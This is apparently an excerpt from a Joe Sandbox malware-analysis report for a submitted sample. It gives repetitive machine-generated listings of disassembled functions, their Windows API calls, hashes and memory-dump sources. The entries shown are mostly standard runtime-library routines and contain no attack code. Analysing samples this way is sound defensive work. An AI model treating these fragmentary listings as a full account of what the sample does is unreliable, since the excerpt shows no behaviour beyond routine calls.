                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                      • String ID:
                                                                      • API String ID: 3936482309-0
                                                                      • Opcode ID: 1fdc0ff546ed6d4a43ce210d05a236f496a8986dbfbfa37c721818c0176f127f
                                                                      • Instruction ID: f011f111ad283f2ee866e9569a6c2db67330aa75c5e37571213714069e99cb81
                                                                      • Opcode Fuzzy Hash: 1fdc0ff546ed6d4a43ce210d05a236f496a8986dbfbfa37c721818c0176f127f
                                                                      • Instruction Fuzzy Hash: 3B312DB4A0025ADFDB04DF98C991BAEB7B1FF89704F148658E5266B3D1C771AD00CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 576 aa36e0-aa3709 577 aa370b-aa372c call aa6380 576->577 578 aa372f-aa37a9 call aa6b60 call aa5a90 call aa5f70 call aa5e90 576->578 577->578 589 aa37ab-aa37bc call aa63c0 578->589 590 aa37c1-aa37d8 578->590 589->590
                                                                      APIs
                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00AA371A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                      • String ID:
                                                                      • API String ID: 3936482309-0
                                                                      • Opcode ID: 4fc352afb30af3fbe4df4778520e41947261cb007d471fd884f6d99195c78e55
                                                                      • Instruction ID: 7e11ff963e36cbb7ef6b08f0a3a43c1c08f5d9d1f75fb570bcc0c5302bdbb9da
                                                                      • Opcode Fuzzy Hash: 4fc352afb30af3fbe4df4778520e41947261cb007d471fd884f6d99195c78e55
                                                                      • Instruction Fuzzy Hash: 2A312FB4A00219DFDB04DF98C991BAEB7B2FF45704F148658E4266B3D1C771AD00CB95
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: 118b2856f456e5d6b6cc8856fb396061f7f39ca8688248fdf86f7fc68fd873f9
                                                                      • Instruction ID: 9601493ab527dcd87a60e8a26859178b9a11987e32a12d685bb46c0e2b311cd7
                                                                      • Opcode Fuzzy Hash: 118b2856f456e5d6b6cc8856fb396061f7f39ca8688248fdf86f7fc68fd873f9
                                                                      • Instruction Fuzzy Hash: 8E111871A0410AAFCB05DF58E941EDA7BF9EF48304F054059F809AB252DA30E911CB65
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,00AA112E,00AAEB35,?,00AB6514,00000001,00000364,00000006,000000FF,00AAEB35,00AAEB35,?,00AADF2C,00AB125E,FF85FFFF), ref: 00AB7990
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 415dfeaed31b68e79718b4e5f4bc1a296fbd7f7c7504ef4515f31d5f24eb57cd
                                                                      • Instruction ID: bc0c64587c8644275c46d2bf907c6e23218d954f71145ac26af41dc8af52073e
                                                                      • Opcode Fuzzy Hash: 415dfeaed31b68e79718b4e5f4bc1a296fbd7f7c7504ef4515f31d5f24eb57cd
                                                                      • Instruction Fuzzy Hash: DAF089316096256AAB616B729D05FEF7B6DAFC2770B298112AC14E61D3CBB0D80186E0
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,00000000,?,00AC43E7,?,?,00000000,?,00AC43E7,?,0000000C), ref: 00AC4014
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 2b82fcb5755dc0f6b0508c84c8bf4b4aeea6c58ba23d54b3b5be99d3b94f2055
                                                                      • Instruction ID: 646d7a95388af57ff2a0db356f8c85dfc860b26a3171c754c68290a613bbaeb9
                                                                      • Opcode Fuzzy Hash: 2b82fcb5755dc0f6b0508c84c8bf4b4aeea6c58ba23d54b3b5be99d3b94f2055
                                                                      • Instruction Fuzzy Hash: 52D06C3200010DBBDF029F84DC06EDA3BAAFB48754F014040BA1856020C736E962AB90
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00AB40D9,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC0CC5
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AB40D9,?,?,?,00000055,?,-00000050,?,?), ref: 00AC0CFC
                                                                      • _wcschr.LIBVCRUNTIME ref: 00AC0D90
                                                                      • _wcschr.LIBVCRUNTIME ref: 00AC0D9E
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AC0E5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                      • String ID: utf8
                                                                      • API String ID: 4147378913-905460609
                                                                      • Opcode ID: c21dc77c5837c9e9460e10e22a3bef5283c00ca1b621f868910cc70832223229
                                                                      • Instruction ID: 4023d5e3728fa428261b8346b88db2616695d36856433e6648c40e22974f6347
                                                                      • Opcode Fuzzy Hash: c21dc77c5837c9e9460e10e22a3bef5283c00ca1b621f868910cc70832223229
                                                                      • Instruction Fuzzy Hash: 32711371A04206EBDB25ABB4CD42FFA73A8EF45700F12452EF546DB182FB74E9458760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: fbb9c9988daa240ebbba92b5a42f1c17836a6279f799281cf4a78af813f180c3
                                                                      • Instruction ID: b6af375aa825975eb2273bbc1216c37b9fcb453514b5e5956994d9a7c71f735c
                                                                      • Opcode Fuzzy Hash: fbb9c9988daa240ebbba92b5a42f1c17836a6279f799281cf4a78af813f180c3
                                                                      • Instruction Fuzzy Hash: 74D20772E086298FDF65CF28CD44BEAB7B5EB44305F1541EAD40DA7240EB78AE858F41
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000000,2000000B,00AC16B1,00000002,00000000,?,?,?,00AC16B1,?,00000000), ref: 00AC1438
                                                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,00AC16B1,00000002,00000000,?,?,?,00AC16B1,?,00000000), ref: 00AC1461
                                                                      • GetACP.KERNEL32(?,?,00AC16B1,?,00000000), ref: 00AC1476
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 36342e5619b132194b4c07318c1d365b3d2605bb1cd3a9e4a2e9c8d84ac258ed
                                                                      • Instruction ID: e687782c2ea48737527db8d62d275a59f53e179f6297ebbebc9bbab01ba16bf6
                                                                      • Opcode Fuzzy Hash: 36342e5619b132194b4c07318c1d365b3d2605bb1cd3a9e4a2e9c8d84ac258ed
                                                                      • Instruction Fuzzy Hash: BF2183B6700101A6DB38CF64CA01F9772B7AF56B58B57846CE94ADB202E732DD41C390
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AC1683
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00AC16C1
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00AC16D4
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AC171C
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AC1737
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                      • String ID:
                                                                      • API String ID: 415426439-0
                                                                      • Opcode ID: db1444f29ec5f68743cfb59c1df0646420bf456886c84777cb71370b398bae88
                                                                      • Instruction ID: 88bb53cdf4f141646f75ca683918556c77f1a7149b7011e8f930b7da6c7bb461
                                                                      • Opcode Fuzzy Hash: db1444f29ec5f68743cfb59c1df0646420bf456886c84777cb71370b398bae88
                                                                      • Instruction Fuzzy Hash: A4518C71A00209ABDF10DFA4CC41FBE77B9FF0A700F1A456DE905E7292EB7099058B60
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
                                                                      • Instruction ID: ca8d08eed4ff5897cf1b8217c830b0ff95871aad21f6ac176b3b580d18dfeb96
                                                                      • Opcode Fuzzy Hash: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
                                                                      • Instruction Fuzzy Hash: 07022971E012199BDB14CFA9D9807EEBBF5FF48314F24826AD919EB341D731AA41CB90
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AAA4E3
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00AAA5AF
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AAA5CF
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00AAA5D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: 1d58f61e49e2c0f02fbc8e63425f995bc5187f539ccce98be9dd1523e532e225
                                                                      • Instruction ID: 31656d3bb557e41c93696adc2e6ff0ca9095a61f6b6fd353f0d24d49b643c091
                                                                      • Opcode Fuzzy Hash: 1d58f61e49e2c0f02fbc8e63425f995bc5187f539ccce98be9dd1523e532e225
                                                                      • Instruction Fuzzy Hash: 0B310675D012189BDB21DFA4D989BCDBBB8BF18300F1041AAE40CAB290EB755A89CF15
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC1077
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC10C1
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC1187
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 661929714-0
                                                                      • Opcode ID: 8e7aa24c12340eacdd262d0c1365e5b9960c977f65ec3efa7fef44502bf558d8
                                                                      • Instruction ID: 937f826992d089f00385c56851b7dcda52af5500875a7e362c9c2a39cab86ffd
                                                                      • Opcode Fuzzy Hash: 8e7aa24c12340eacdd262d0c1365e5b9960c977f65ec3efa7fef44502bf558d8
                                                                      • Instruction Fuzzy Hash: 2B61BF716101079FEF28DF28CD82FAAB7A8EF16314F15417DEA05C6682EB38D985DB50
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00AA112E), ref: 00AB11D9
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00AA112E), ref: 00AB11E3
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00AA112E), ref: 00AB11F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: b14fb7e4f1dcd2550de2b86b2379fe216c998472dc50aed21d22cccfef8407b2
                                                                      • Instruction ID: 64a39753da2174f790918f24c368f2f278c3f7ddf3f7112beca9f08bcd3a749d
                                                                      • Opcode Fuzzy Hash: b14fb7e4f1dcd2550de2b86b2379fe216c998472dc50aed21d22cccfef8407b2
                                                                      • Instruction Fuzzy Hash: 5631B37490121C9BCB21DF64D989BCDBBB8BF08310F5042EAE41CA72A1EB749B85CF45
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ABBCA1,?,?,00000008,?,?,00AC4F8A,00000000), ref: 00ABBED3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 98dde01bb48556a272cf3fc4e30ca9e170b39414b889e8f36bd9cd80641c9845
                                                                      • Instruction ID: 8971bdb98936b45bb59c861613d2bcb399263647511b6c34c637c0c3bbbc4ddc
                                                                      • Opcode Fuzzy Hash: 98dde01bb48556a272cf3fc4e30ca9e170b39414b889e8f36bd9cd80641c9845
                                                                      • Instruction Fuzzy Hash: C1B14D31220608DFD715CF28C486BA57BE4FF45364F298698E999CF2A2C375E991CB50
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AAA75B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-0
                                                                      • Opcode ID: 4fc34ed2a8e718e07179fe49d74555b4a3196147ad8b18544f5b8f5ad758d05a
                                                                      • Instruction ID: 5ee5a4f6cd343e1007663aa3c89ee813143675bd86c228a3dc3453f9956425b6
                                                                      • Opcode Fuzzy Hash: 4fc34ed2a8e718e07179fe49d74555b4a3196147ad8b18544f5b8f5ad758d05a
                                                                      • Instruction Fuzzy Hash: C25180B1E056058FDB18CFA5E8857AEBBF0FB58310F14856AD416EB290E7789D02CF51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c077c9e52c84067a9499a4c14b5c2d60f7bef2296bd3d869c2e13a81eb631ca
                                                                      • Instruction ID: 998bcca381236fb01d30a2a44db229632443066efe5d391a31bc7594bb22530f
                                                                      • Opcode Fuzzy Hash: 1c077c9e52c84067a9499a4c14b5c2d60f7bef2296bd3d869c2e13a81eb631ca
                                                                      • Instruction Fuzzy Hash: C4418275805219AEDB20EF79CC89EEABBBDAF45300F1442DDE41997202EA359E858F50
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC12CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 3736152602-0
                                                                      • Opcode ID: a43098f59294e0454fff9c63165e8f592dc4069b470fb5edbb76cb8e1601532b
                                                                      • Instruction ID: b4ac7fd44d21ff6b26256f41d50917244efc768e3d6b6c1e76960b86bab66f45
                                                                      • Opcode Fuzzy Hash: a43098f59294e0454fff9c63165e8f592dc4069b470fb5edbb76cb8e1601532b
                                                                      • Instruction Fuzzy Hash: 0121B332610246ABDB18AF69DD41FBA37ACEF16318F11007EF902DA642EB38DD018650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
